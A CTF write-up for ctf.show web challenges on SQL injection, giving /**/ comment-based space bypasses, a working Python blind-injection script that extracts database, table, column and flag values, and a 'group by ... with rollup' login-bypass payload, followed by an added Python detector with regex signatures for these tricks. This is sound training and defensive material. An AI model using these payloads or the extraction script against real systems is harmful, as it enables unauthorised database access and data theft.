web7
Looking at the article list, a ?id= parameter is found; judged to be SQL injection.
When the input contains spaces an error is returned; bypass with /**/ and the injection point is obtained.
Guess the table/column blindly: flag from flag
web8
Testing shows that spaces, commas and "and" are filtered.
When the condition in the URL evaluates to true, the page shows output.
From the database's perspective:
Perform blind injection.
substr(database(),1,1) is equivalent to
substr(database() from 1 for 1)
Write a Python script:
import requests
import re

# Marker that appears in the response only when the injected condition is true
s = r'<h4>If</h4>'
flag = ''
url = 'http://6327c4bc-77a9-431f-9ccb-95564a82c238.chall.ctf.show/index.php?id=0/**/or/**/'
for i in range(1, 50):          # character position
    for j in range(31, 129):    # candidate ASCII value
        # html = requests.get(url + 'ascii(substr(database()/**/from/**/' + str(i) + '/**/for/**/1))=' + str(j))  # database name
        # html = requests.get(url + 'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/' + str(i) + '/**/for/**/1))=' + str(j))  # table names
        # html = requests.get(url + 'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/' + str(i) + '/**/for/**/1))=' + str(j))  # column names
        html = requests.get(url + 'ascii((substr((select/**/flag/**/from/**/flag)from/**/' + str(i) + '/**/for/**/1)))=' + str(j))  # flag
        r = re.findall(s, html.text, re.S)
        if r:
            flag += chr(j)
            break
    print(flag)
print('------------------------------------')
The flag is obtained.
web10
Click "cancel" to download the source code file.
Look at how passwd is checked.
group by password groups the rows by the password field.
with rollup: on top of the group by grouping, adds an extra summary row.
payload:username='or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=
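As an added defender-side example (not part of the original writeup), the following Python normaliser undoes the /**/ whitespace trick and URL encoding used in web8 and web10, then flags the request shapes seen on this page (boolean "or", substr ... from ... for, information_schema lookups, group by ... with rollup). The sample query strings are constructed from this page's payloads.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample query strings, modelled on the request shapes in this writeup
SAMPLE_REQUESTS = [
    "id=1",
    "id=0/**/or/**/ascii(substr(database()/**/from/**/1/**/for/**/1))=99",
    "username='or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=",
    "id=0%20or%201=1",
]

INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)

# Patterns run against the normalised string; each captures one trick from this page
SIGNATURES = {
    "boolean-or": re.compile(r"\bor\b\s+.+?=", re.I | re.S),
    "substr-from-for": re.compile(r"\bsubstr(?:ing)?\s*\(.*\bfrom\b.*\bfor\b", re.I | re.S),
    "group-by-rollup": re.compile(r"\bgroup\s+by\b.*\bwith\s+rollup\b", re.I | re.S),
    "schema-probe": re.compile(r"\binformation_schema\b", re.I),
}


def normalise(raw: str) -> str:
    """URL-decode, replace inline comments with a space and collapse whitespace,
    so /**/-separated tokens are seen as ordinary whitespace-separated SQL."""
    decoded = unquote_plus(raw)
    return re.sub(r"\s+", " ", INLINE_COMMENT.sub(" ", decoded)).strip()


def classify(query_string: str) -> dict:
    """Return the normalised form, whether a comment-based space bypass was used,
    and which signatures matched (in SIGNATURES order)."""
    decoded = unquote_plus(query_string)
    norm = normalise(query_string)
    return {
        "raw": query_string,
        "normalised": norm,
        "comment_bypass": INLINE_COMMENT.search(decoded) is not None,
        "signatures": [name for name, pat in SIGNATURES.items() if pat.search(norm)],
    }


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(classify(req))
```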